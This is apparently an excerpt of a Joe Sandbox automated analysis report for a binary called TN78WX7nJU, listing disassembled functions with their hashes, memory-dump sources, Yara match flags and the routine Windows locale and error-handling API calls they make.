                                                                                                                                                                                                                                                                • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                • Instruction ID: 8cdf4942245fb07499dfcbfde2d2b629970e6a449e81b357afbaf2dd344a87d1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A314AB6920609DFDB11DF99C880AAEBBF9FF48324F15504AD841A7310D771EA49CFA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                • Instruction ID: 2217916c504f1f1d1b273bf3e4caba0a0b36402970917dedf2fb6aebb3c01604
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7022D71E012199FDF14CFA9C9906AEBBF1EF98314F15826AD919E7380D731A945CF80
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0248262C
                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 024827CA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4264772764-0
                                                                                                                                                                                                                                                                • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                • Instruction ID: f0261b97a0c40fe91b5043467f19790d747a5e6a9800cc3e9b6adf87d4469498
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07412125964384A5E731FFA5BC45B2637B0FF64B26F10252BD528CB2B2E3B28540C75E
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,024B6F21,?,?,00000008,?,?,024BF3E2,00000000), ref: 024B7153
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                • Instruction ID: 2c4f3313a7d70be27a4a72d45cf7591d85ca2a479e0586fbe5880f57e6a85a08
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00B150325106089FD716CF28C486BA5BBE1FF45368F25865AE89ACF3A1C335D992CF50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B21A0
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21AD
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024BB900
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                                • Instruction ID: 3e58ed383412d02b6093fc32fb4da5b0817d2288ecdfd0a8e0b2537ca30c963a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED218E3295020AABDF26AE29DC41BFA77ADEF08318F10017BED01D6250EB799945CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2955987475-0
                                                                                                                                                                                                                                                                • Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                                                • Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024B0A1C,?,024BBC89,00000000,?,?,?), ref: 024BB5A6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                • Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                • Instruction ID: 7e515b8481e1f4e6acfecb63905f49a3f367a1b8ffb0b433585ee7fb32156f02
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6111E53A2007059FDB199F39C8A16BBBB92FF8475CB15482EDE8687B40D771B942CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                • Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                • Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024BB87A,00000000,00000000,?), ref: 024BBB08
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 787680540-0
                                                                                                                                                                                                                                                                • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                • Instruction ID: 22e2ff09c2b26448e486839dd22a166a8aee82b80c065b84543dbf6df423df52
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5F0F932A141156BDB299A29CC45BFB7758EF4071CF04046ADD05A3644EB70FE42CAE0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 787680540-0
                                                                                                                                                                                                                                                                • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024B0A1C,?,024BBC4D,024B0A1C,?,?,?,?,?,024B0A1C,?,?), ref: 024BB61B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                • Instruction ID: 605a5bdb758170fdeb429ac795dbbfafa2a361accdca591ab408f29a21a6ed8b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7F0C2363007045FDB265F39DC81BBA7B95EF8076CF15442EFE058B650D7B19C028A64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024B047A,?,00000004), ref: 024B547A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                • Instruction ID: cc8a1ba2b889b976d33af3994c7ba25a8026f038811202c10f4acefb457fe579
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF0BB31680318BFDB126F61DC01FAEBB66EF04F12F90415AFD0567290DA719D21AA99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024AE654: RtlEnterCriticalSection.NTDLL(02030DAF), ref: 024AE663
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024B506C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                • Instruction ID: 51751c5df23070daea4d4afeea8e2ce78f22671b216f8f8e3d5e9a705c77af24
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0F04932A20304DFEB10EF69D905B9D7BE1AF15721F10426AF914DB2E1CB799944CF4A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024BBCAB,024B0A1C,?,?,?,?,?,024B0A1C,?,?,?), ref: 024BB520
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                                                • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                • Instruction ID: 94eb1a1080926b880cd2fcfe5aca514b8a473e9c33ffa5188d5fdf0a06bed6ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7F0E53A30020957CB099F3ADC557ABBF94EFC1754B5A405EEF0A8B290D7759942CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
